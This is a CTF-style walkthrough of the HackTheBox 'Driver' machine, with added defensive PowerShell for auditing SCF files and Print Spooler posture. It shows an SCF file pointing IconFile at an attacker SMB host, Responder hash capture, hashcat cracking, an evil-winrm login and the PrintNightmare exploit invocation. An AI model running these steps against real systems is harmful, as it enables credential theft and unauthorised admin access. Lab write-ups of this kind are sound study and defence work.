Driver — Hackthebox Walkthrough
I am happy to say that finally someone made an easy Windows box on HTB. Great thanks to @MrR3boot for that. I loved this box as it had a pretty unique attack path and didn't need much knowledge of Windows specifics.
User
Starting off with nmap I saw there were a couple of ports open: 80 and 5985 (HTTP), 135 (RPC) and 445 (SMB).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Visiting the web server on port 80, I found a static website about firmware updates for printers. Looking around a bit, I saw a page that allowed me to upload firmware.
Since the page stated that the uploaded files are stored in a file share and manually checked, I knew this had something to do with the SMB server we saw in the nmap results.
First I tried uploading PHP reverse shells to see if I could get a shell that way, but that was a bust. So I had to do some digging. While I was looking, I came across this article which explains SCF (Shell Command File) attacks against SMB shares.
As mentioned in the article, I made an SCF file called "attack.scf".
[Shell]
Command=2
IconFile=\\10.10.14.235\test\test.ico
[Taskbar]
Command=ToggleDesktop
Then I started Responder.
sudo responder -I tun0 -vv
Finally I uploaded the attack.scf file I made, and shortly afterwards I got the NTLMv2 hash of the tony user.
What seems to have happened is that once attack.scf was uploaded, the tony user logged in to the SMB share and browsed the folder containing the file. Since the IconFile entry pointed at our SMB server, Explorer tried to fetch the icon from it and Responder was able to catch tony's hash.
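The behaviour described above (Explorer resolving a remote IconFile as soon as someone browses the share) is exactly what a defender should be looking for on a share that accepts arbitrary uploads. The following PowerShell is an added example and is not part of the original walkthrough: it parses SCF files found under the upload share, reports any whose [Shell] section points IconFile at a UNC path, and optionally moves them to a quarantine folder. The share root and quarantine paths are assumptions; adjust them per host.

```powershell
# Added example, not from the original walkthrough: audit the share behind the
# firmware upload page for SCF files whose IconFile points at a UNC path.
# Explorer resolves that path as soon as someone browses the folder, which is
# what leaked tony's NTLM hash above. $ShareRoot and $Quarantine are assumptions.

function Test-ScfUncIcon {
    # Returns the UNC target if the file is an SCF whose [Shell] section has a
    # remote IconFile, otherwise $null. Only the [Shell] section is inspected.
    param([Parameter(Mandatory)][string]$Path)

    $inShell = $false
    foreach ($line in (Get-Content -LiteralPath $Path -ErrorAction Stop)) {
        $t = $line.Trim()
        if ($t -match '^\[(.+)\]$') { $inShell = ($Matches[1] -ieq 'Shell'); continue }
        # Matches \\host\share\file.ico ; -match is case-insensitive by default
        if ($inShell -and $t -match '^IconFile\s*=\s*(\\\\[^\\]+\\.+)$') { return $Matches[1] }
    }
    return $null
}

function Find-ScfUncIcon {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [string]$ShareRoot  = 'C:\FirmwareUploads',   # assumption: where the upload page stores files
        [string]$Quarantine = 'C:\Quarantine',        # assumption
        [switch]$Move                                 # move hits out of the share
    )

    foreach ($f in Get-ChildItem -LiteralPath $ShareRoot -Recurse -File -Filter '*.scf') {
        $target = Test-ScfUncIcon -Path $f.FullName
        if (-not $target) { continue }                # benign SCF (local icon or none)

        [pscustomobject]@{
            File       = $f.FullName
            IconTarget = $target                      # the host that would receive the NTLM authentication
            Owner      = (Get-Acl -LiteralPath $f.FullName).Owner
            Written    = $f.LastWriteTime
        }

        if ($Move -and $PSCmdlet.ShouldProcess($f.FullName, "Move to $Quarantine")) {
            New-Item -ItemType Directory -Path $Quarantine -Force | Out-Null
            Move-Item -LiteralPath $f.FullName -Destination $Quarantine -Force
        }
    }
}

# Usage:  Find-ScfUncIcon | Format-Table
#         Find-ScfUncIcon -Move -WhatIf
```

Scanning the share only catches the file after it lands; the upload handler should also reject anything that is not an expected firmware extension, and the hosts that browse the share should not be able to make outbound SMB connections to untrusted addresses, since that is the connection Responder is waiting for.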
Then I used hashcat to crack the captured hash.
hashcat -m 5600 --force hash.txt rockyou.txt
The password came back as liltony. With this, I used evil-winrm and logged in to the box as tony.
evil-winrm.rb -u tony -p liltony -i 10.10.11.106
Root
First off, I uploaded and ran winpeas.exe for basic enumeration. There weren't any eye-catching vulnerabilities, but I saw that "spoolsv" was running.
So I googled this and found out about a CVE called PrintNightmare. As the name suggests, it exploits a built-in Windows service named "Print Spooler" that is enabled by default on Windows machines.
With a little effort, I found a PowerShell exploit on GitHub for this.
So I cloned the repository and uploaded the PowerShell script to the box. But before running the script I had to change the Execution Policy to be able to import the PowerShell module I uploaded.
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
Then, as described in the README.md, I imported the PowerShell script and ran it.
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare
The script added a new user called adm1n with a password of P@ssw0rd to the Administrators group. Finally, I was able to log in with those credentials and get administrative access to the machine.
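Two things in this section are worth turning into checks from the defending side: the service and Point and Print policy that PrintNightmare depends on, and the trace the exploit left behind (a new member of the local Administrators group). The PowerShell below is an added example; it is not the walkthrough's code and not taken from the exploit repository. The baseline administrator list is an assumption and the registry values are the ones Microsoft documented for the PrintNightmare mitigations.

```powershell
# Added example, not from the walkthrough or the exploit repository: check the
# Print Spooler posture PrintNightmare relies on, and audit for what the exploit
# left behind (a new member of the local Administrators group). The baseline
# admin list is an assumption; set it per host.

$PointAndPrint = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'

function Get-SpoolerPosture {
    $svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $reg = Get-ItemProperty -Path $PointAndPrint -ErrorAction SilentlyContinue
    [pscustomobject]@{
        SpoolerStatus    = if ($svc) { $svc.Status }    else { 'NotInstalled' }
        SpoolerStartType = if ($svc) { $svc.StartType } else { $null }
        # Absent or 1 = only administrators may install printer drivers (the
        # post-August-2021 default); 0 re-allows non-admin driver installs.
        RestrictDriverInstallationToAdministrators = $reg.RestrictDriverInstallationToAdministrators
        # Both should be absent or 0; 1 lets non-admins install drivers without a prompt.
        NoWarningNoElevationOnInstall = $reg.NoWarningNoElevationOnInstall
        UpdatePromptSettings          = $reg.UpdatePromptSettings
    }
}

function Test-SpoolerHardened {
    # True when the spooler is not running, or when Point and Print policy does
    # not allow non-admin driver installs. Patch level still needs a separate check.
    $p = Get-SpoolerPosture
    if ($p.SpoolerStatus -ne 'Running') { return $true }
    return ($p.RestrictDriverInstallationToAdministrators -ne 0) -and
           ($p.NoWarningNoElevationOnInstall -ne 1) -and
           ($p.UpdatePromptSettings -ne 1)
}

function Disable-PrintSpooler {
    # Mitigation for hosts that never print: stop the service and keep it stopped.
    [CmdletBinding(SupportsShouldProcess)] param()
    if ($PSCmdlet.ShouldProcess('Spooler', 'Stop and disable')) {
        Stop-Service -Name Spooler -Force
        Set-Service  -Name Spooler -StartupType Disabled
    }
}

function Get-UnexpectedLocalAdmin {
    # Members of local Administrators not in the baseline, plus the Security log
    # events that record how they got there (4720 = account created,
    # 4732 = member added to a security-enabled local group).
    param([string[]]$Baseline = @("$env:COMPUTERNAME\Administrator"))   # assumption
    $members = Get-LocalGroupMember -Group 'Administrators' |
               Where-Object { $Baseline -notcontains $_.Name }
    $events  = Get-WinEvent -ErrorAction SilentlyContinue -FilterHashtable @{
                   LogName = 'Security'; Id = 4720, 4732; StartTime = (Get-Date).AddDays(-7) }
    [pscustomobject]@{ UnexpectedMembers = $members.Name; RecentAccountEvents = $events }
}

# Usage:  Get-SpoolerPosture
#         Test-SpoolerHardened
#         Get-UnexpectedLocalAdmin
#         Disable-PrintSpooler -WhatIf
```

On the box as described, Get-SpoolerPosture would show the spooler running, and after the exploit Get-UnexpectedLocalAdmin would list adm1n alongside the 4720 and 4732 events that created it and added it to the group; those two event IDs on a host that is not a domain controller are a cheap, high-signal alert.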
Rooted!!!
“If you have any questions, make sure to leave them down in the comments, or contact me through social media.”
Email — iamkavigihan@gmail.com
Instagram — https://www.instagram.com/_kavi.gihan/
Happy Hacking !!! 😄